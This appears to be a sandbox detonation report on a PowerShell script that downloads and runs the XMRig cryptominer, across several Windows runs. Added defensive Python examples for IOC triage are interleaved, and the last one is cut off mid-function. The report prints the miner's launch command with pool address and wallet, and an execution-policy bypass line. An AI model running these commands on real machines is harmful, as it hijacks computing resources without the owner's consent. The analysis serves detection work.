memory/4268-129-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-130-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-131-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-132-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-133-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-134-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-135-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-136-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-137-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-138-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-139-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-140-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-141-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-142-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-143-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-144-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-145-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-146-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-147-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-148-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-149-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-150-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-151-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-152-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-153-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-154-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-155-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

memory/4268-156-0x00007FF6B3F80000-0x00007FF6B4BB3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:40

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1795s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 rows, all with empty columns)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4404-4-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp

memory/4404-5-0x0000027B5F8A0000-0x0000027B5F8C2000-memory.dmp

memory/4404-8-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/4404-9-0x0000027B5FBA0000-0x0000027B5FC16000-memory.dmp

memory/4404-10-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b5wuberz.kox.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4404-25-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/4404-48-0x0000027B5FB80000-0x0000027B5FB92000-memory.dmp

memory/4404-61-0x0000027B5FB70000-0x0000027B5FB7A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/752-90-0x000001BD835E0000-0x000001BD83600000-memory.dmp

memory/752-91-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-92-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/4404-93-0x00007FFC1AAA3000-0x00007FFC1AAA4000-memory.dmp

memory/4404-94-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/4404-95-0x00007FFC1AAA0000-0x00007FFC1B48C000-memory.dmp

memory/752-96-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-97-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-98-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-99-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-100-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-101-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-102-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-103-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-104-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-105-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-106-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-107-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-108-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-109-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-110-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-111-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-112-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-113-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-114-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-115-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-116-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-117-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-118-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-119-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-120-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-121-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-122-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-123-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-124-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-125-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-126-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-127-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-128-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-129-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-130-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-131-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-132-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-133-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-134-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-135-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-136-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-137-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-138-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-139-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-140-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-141-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-142-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-143-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-144-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-145-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-146-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-147-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-148-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-149-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-150-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-151-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-152-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-153-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-154-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-155-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

memory/752-156-0x00007FF6B1C40000-0x00007FF6B2873000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:50

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 rows, all with empty columns)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
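Each Network table in this report mixes three kinds of rows: forward lookups to 8.8.8.8, the TCP connections that followed them, and PTR (in-addr.arpa) lookups. Pairing the PTR names with the connections tells a responder which reverse lookups belong to the miner's traffic (github.com for the download, rx.unmineable.com for the pool) and which are unrelated background lookups by the sandbox VM. The Python below is an added example, not part of this report; it runs over the behavioral30 rows, copied verbatim, and applies in the same way to the behavioral1, behavioral12 and behavioral19 tables. The NetRow field names are this example's own.

```python
import ipaddress
import re
from dataclasses import dataclass

# Rows copied from the behavioral30 Network table of this report
# (columns: Country, Destination, Domain, Proto).
NETWORK_ROWS = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
"""


@dataclass(frozen=True)
class NetRow:
    country: str
    dest_ip: str
    dest_port: int
    domain: str
    proto: str


def parse_rows(text):
    """Parse the whitespace-separated table; a 3-field row has an empty Domain column."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        elif len(parts) == 4:
            country, dest, domain, proto = parts
        else:
            continue
        ip, _, port = dest.rpartition(":")
        rows.append(NetRow(country, ip, int(port), domain, proto))
    return rows


def ptr_to_ip(name):
    """Turn '215.156.26.20.in-addr.arpa' into '20.26.156.215'; None if not an IPv4 PTR name."""
    m = re.fullmatch(r"((?:\d{1,3}\.){4})in-addr\.arpa\.?", name, re.IGNORECASE)
    if not m:
        return None
    ip = ".".join(reversed(m.group(1).rstrip(".").split(".")))
    try:
        ipaddress.IPv4Address(ip)
    except ValueError:
        return None
    return ip


def correlate_ptr_lookups(rows):
    """Map every PTR lookup to the forward name seen connecting to that IP.

    Returns (matched, unmatched): matched is {ip: forward_domain} for reverse
    lookups that correspond to an observed TCP connection; unmatched lists the
    IPs that were reverse-resolved without any connection in the table.
    """
    forward = {r.dest_ip: r.domain for r in rows if r.proto == "tcp" and r.domain}
    matched, unmatched = {}, []
    for r in rows:
        ip = ptr_to_ip(r.domain)
        if ip is None:
            continue
        if ip in forward:
            matched[ip] = forward[ip]
        else:
            unmatched.append(ip)
    return matched, unmatched
```

For the behavioral30 table this pairs three PTR lookups with the GitHub and unmineable connections and leaves three IPs (52.111.229.43, 20.42.73.28, 2.18.24.18) unmatched; those are the ones to discount before adding anything from the Network table to an indicator list.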

Files

memory/3556-0-0x00007FFDA2573000-0x00007FFDA2575000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ujhognzz.crm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3556-9-0x000001CEF5E40000-0x000001CEF5E62000-memory.dmp

memory/3556-10-0x00007FFDA2570000-0x00007FFDA3032000-memory.dmp

memory/3556-11-0x00007FFDA2570000-0x00007FFDA3032000-memory.dmp

memory/3556-12-0x00007FFDA2570000-0x00007FFDA3032000-memory.dmp

memory/3556-14-0x000001CEF6140000-0x000001CEF6152000-memory.dmp

memory/3556-15-0x000001CEF5EB0000-0x000001CEF5EBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4624-46-0x000002A7AB280000-0x000002A7AB2A0000-memory.dmp

memory/4624-47-0x000002A7ACBC0000-0x000002A7ACBE0000-memory.dmp

memory/4624-48-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/3556-49-0x00007FFDA2573000-0x00007FFDA2575000-memory.dmp

memory/3556-50-0x00007FFDA2570000-0x00007FFDA3032000-memory.dmp

memory/4624-52-0x000002A7ACC00000-0x000002A7ACC20000-memory.dmp

memory/4624-51-0x000002A7ACBE0000-0x000002A7ACC00000-memory.dmp

memory/4624-53-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/3556-54-0x00007FFDA2570000-0x00007FFDA3032000-memory.dmp

memory/4624-55-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-56-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-57-0x000002A7ACBE0000-0x000002A7ACC00000-memory.dmp

memory/4624-58-0x000002A7ACC00000-0x000002A7ACC20000-memory.dmp

memory/4624-59-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-60-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-61-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-62-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-63-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-64-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-65-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-66-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-67-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-68-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-69-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-70-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-71-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-72-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-73-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-74-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-75-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-76-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-77-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-78-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-79-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-80-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-81-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-82-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-83-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-84-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-85-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-86-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-87-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-88-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-89-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-90-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-91-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-92-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-93-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-94-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-95-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-96-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-97-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-98-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-99-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-100-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-101-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-102-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-103-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-104-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-105-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-106-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-107-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-108-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-109-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-110-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-111-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-112-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-113-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-114-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-115-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-116-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-117-0x00007FF726920000-0x00007FF727553000-memory.dmp
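Two of the files listed in each run deserve different handling. __PSScriptPolicyTest_<random>.ps1 is written by PowerShell itself to test whether AppLocker/WDAC script enforcement is active; on the win10 runs its hashes are those of the single byte "1" (MD5 c4ca4238a0b923820dcc509a6f75849b), while the win11 run (behavioral12) reports a different hash for the same probe. xmrig.exe is the dropped payload and the indicator worth sharing. The Python below is an added example, not part of this report; it confirms the "1" hashes and separates the IOC from analysis noise. MINER_SHA256 and the classification labels are assumptions made for this example.

```python
import fnmatch
import hashlib
import ntpath

# Path/SHA-256 pairs copied from the Files sections of this report (win10 run
# behavioral30, win11 run behavioral12, and the miner present in every run).
REPORTED_FILES = [
    (r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zdfy5fgg.ojr.ps1",
     "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b"),
    (r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ujhognzz.crm.ps1",
     "96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7"),
    (r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"),
]

# Assumed IOC set for this example: the dropped miner's SHA-256 from the report.
MINER_SHA256 = {"2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"}


def digests(data: bytes) -> dict:
    """MD5, SHA-1 and SHA-256 of a byte string, in the order the report lists them."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ("md5", "sha1", "sha256")}


def is_policy_probe(path: str) -> bool:
    """True for PowerShell's AppLocker/WDAC probe file, __PSScriptPolicyTest_<random>.ps1."""
    return fnmatch.fnmatch(ntpath.basename(path).lower(), "__psscriptpolicytest_*.ps1")


def classify(path: str, sha256: str) -> str:
    """Label one file entry: the miner is an IOC, the policy probe is noise, anything else is unknown."""
    if sha256 in MINER_SHA256:
        return "ioc:xmrig"
    if is_policy_probe(path):
        # On the win10 runs the probe's content is the single byte "1".
        if sha256 == digests(b"1")["sha256"]:
            return "noise:policy-probe:content-1"
        return "noise:policy-probe"
    return "unknown"


def build_ioc_list(reported) -> list:
    """The SHA-256 values worth sharing, with sandbox and PowerShell noise removed."""
    return sorted({h for p, h in reported if classify(p, h).startswith("ioc:")})
```

The point of the probe check is to keep the per-run random file names and their hashes out of any blocklist: they are produced by the interpreter, not by the script, and differ between Windows builds.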

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:54

Platform

win10v2004-20240226-en

Max time kernel

1795s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A (64 rows, all with empty columns)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
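The AdjustPrivilegeToken rows above are the most useful detection hook in this run. xmrig enables SeLockMemoryPrivilege so that it can back the RandomX dataset with large pages, a right that ordinary user-space software almost never requests, and it does so from a binary under the user's Temp directory. The Python below is an added example, not code from this report or from xmrig; it scores constructed records shaped like Windows Security event 4703 (a token right was adjusted), filled with the process/privilege pairs listed above, including the svchost.exe SeManageVolumePrivilege row that should not raise a finding. TRUSTED_PREFIXES and the severity rules are assumptions for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class TokenAdjust:
    """One token-right adjustment: the process image and the privileges it enabled."""
    process: str
    enabled: tuple


# Constructed records; process and privilege values are taken from the
# "Suspicious use of AdjustPrivilegeToken" table of the behavioral19 run.
EVENTS = [
    TokenAdjust(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", ("SeDebugPrivilege",)),
    TokenAdjust(r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe", ("SeLockMemoryPrivilege",)),
    TokenAdjust(r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe", ("SeLockMemoryPrivilege",)),
    TokenAdjust(r"C:\Windows\System32\svchost.exe", ("SeManageVolumePrivilege",)),
]

# Assumed for this example: directories only an administrator can write to.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def score(event):
    """Return (severity, reason) for one record, or None if it is not worth raising."""
    path = event.process.lower()
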